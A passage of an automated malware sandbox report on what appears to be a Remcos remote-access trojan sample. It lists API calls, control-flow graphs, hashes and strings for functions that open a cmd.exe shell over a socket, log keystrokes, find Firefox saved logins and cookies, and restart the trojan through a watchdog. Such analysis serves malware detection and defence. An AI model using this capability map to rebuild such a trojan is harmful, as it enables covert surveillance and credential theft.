                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                          • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                          • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                          • String ID:
                          • API String ID: 3658366068-0
                          • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                          • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                          • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                          • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                          Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 437 445a95-445aa9 438 445ab6-445ad1 LoadLibraryExW 437->438 439 445aab-445ab4 437->439 441 445ad3-445adc GetLastError 438->441 442 445afa-445b00 438->442 440 445b0d-445b0f 439->440 445 445ade-445ae9 LoadLibraryExW 441->445 446 445aeb 441->446 443 445b02-445b03 FreeLibrary 442->443 444 445b09 442->444 443->444 448 445b0b-445b0c 444->448 447 445aed-445aef 445->447 446->447 447->442 449 445af1-445af8 447->449 448->440 449->448
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                          • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                          • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                          • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                          • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                          Function 004459F9 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 458 4459f9-445a23 459 445a25-445a27 458->459 460 445a8e 458->460 461 445a2d-445a33 459->461 462 445a29-445a2b 459->462 463 445a90-445a94 460->463 464 445a35-445a37 call 445a95 461->464 465 445a4f 461->465 462->463 468 445a3c-445a3f 464->468 467 445a51-445a53 465->467 469 445a55-445a63 GetProcAddress 467->469 470 445a7e-445a8c 467->470 471 445a70-445a76 468->471 472 445a41-445a47 468->472 473 445a65-445a6e call 432123 469->473 474 445a78 469->474 470->460 471->467 472->464 476 445a49 472->476 473->462 474->470 476->465
                          APIs
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc__crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 2279764990-0
                          • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                          • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                          • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                          • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9
                          Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 478 40163e-401644 479 401646-401648 478->479 480 401649-401654 478->480 481 401656 480->481 482 40165b-401665 480->482 481->482 483 401667-40166d 482->483 484 401688-401689 call 43229f 482->484 483->484 486 40166f-401674 483->486 487 40168e-40168f 484->487 486->481 488 401676-401686 call 43229f 486->488 489 401691-401693 487->489 488->489
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                          • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                          • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                          • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                          Function 0044D2B4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 492 44d2b4-44d2c1 call 443005 494 44d2c6-44d2d1 492->494 495 44d2d7-44d2df 494->495 496 44d2d3-44d2d5 494->496 497 44d31f-44d32d call 443c92 495->497 498 44d2e1-44d2e5 495->498 496->497 500 44d2e7-44d319 call 445fb3 498->500 504 44d31b-44d31e 500->504 504->497
                          APIs
                            • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                          • _free.LIBCMT ref: 0044D320
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                          • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
                          • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                          • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738
                          Function 00443005 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 505 443005-443010 506 443012-44301c 505->506 507 44301e-443024 505->507 506->507 508 443052-44305d call 43ad91 506->508 509 443026-443027 507->509 510 44303d-44304e RtlAllocateHeap 507->510 515 44305f-443061 508->515 509->510 511 443050 510->511 512 443029-443030 call 442a57 510->512 511->515 512->508 518 443032-44303b call 440480 512->518 518->508 518->510
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                          • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                          • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                          • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD
                          Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 521 443649-443655 522 443687-443692 call 43ad91 521->522 523 443657-443659 521->523 531 443694-443696 522->531 524 443672-443683 RtlAllocateHeap 523->524 525 44365b-44365c 523->525 527 443685 524->527 528 44365e-443665 call 442a57 524->528 525->524 527->531 528->522 533 443667-443670 call 440480 528->533 533->522 533->524
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                          • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                          • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                          • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

                          Non-executed Functions

                          Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                            • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                            • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                            • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                          • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                          • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                          • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                          • API String ID: 3018269243-1736093966
                          • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                          • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                          • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                          • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                          Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 004056C6
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • __Init_thread_footer.LIBCMT ref: 00405703
                          • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                          • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                            • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                          • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                          • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                          • CloseHandle.KERNEL32 ref: 00405A03
                          • CloseHandle.KERNEL32 ref: 00405A0B
                          • CloseHandle.KERNEL32 ref: 00405A1D
                          • CloseHandle.KERNEL32 ref: 00405A25
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                          • String ID: SystemDrive$cmd.exe
                          • API String ID: 2994406822-3633465311
                          • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                          • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                          • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                          • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                          Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                          • FindClose.KERNEL32(00000000), ref: 0040AB0A
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                          • FindClose.KERNEL32(00000000), ref: 0040AC53
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                          • API String ID: 1164774033-3681987949
                          • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                          • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                          • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                          • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                          Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0$1$2$3$4$5$6$7
                          • API String ID: 0-3177665633
                          • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                          • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                          • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                          • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                          Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                          • GetLastError.KERNEL32 ref: 00418771
                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                          • String ID:
                          • API String ID: 3587775597-0
                          • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                          • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                          • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                          • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                          Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                          • FindClose.KERNEL32(00000000), ref: 0040B3BE
                          • FindClose.KERNEL32(00000000), ref: 0040B3E9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                          • API String ID: 1164774033-405221262
                          • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                          • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                          • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                          • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                          Function 0041A01B Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                            • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                          • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                          • String ID:
                          • API String ID: 2341273852-0
                          • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                          • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                          • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                          • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                          Function 00410763 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                          • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                          • SetLastError.KERNEL32(0000000E), ref: 0041082E
                            • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                          • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                          • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                          • SetLastError.KERNEL32(0000045A), ref: 0041098F
                            • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                            • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                          • String ID: $.F
                          • API String ID: 3950776272-1421728423
                          • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                          • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                          • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                          • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                          Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                          • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                          • GetLastError.KERNEL32 ref: 00409375
                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                          • TranslateMessage.USER32(?), ref: 004093D2
                          • DispatchMessageA.USER32(?), ref: 004093DD
                          Strings
                          • Keylogger initialization failure: error , xrefs: 00409389
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                          • String ID: Keylogger initialization failure: error
                          • API String ID: 3219506041-952744263
                          • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                          • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                          • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                          • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                          Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                          • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressCloseCreateLibraryLoadProcsend
                          • String ID: SHDeleteKeyW$Shlwapi.dll
                          • API String ID: 2127411465-314212984
                          • Opcode ID: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                          • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                          • Opcode Fuzzy Hash: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                          • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                          Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00446741
                          • _free.LIBCMT ref: 00446765
                          • _free.LIBCMT ref: 004468EC
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                          • _free.LIBCMT ref: 00446AB8
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID:
                          • API String ID: 314583886-0
                          • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                          • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                          • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                          • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                          Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON
                          Download Yara Rule
                          APIs
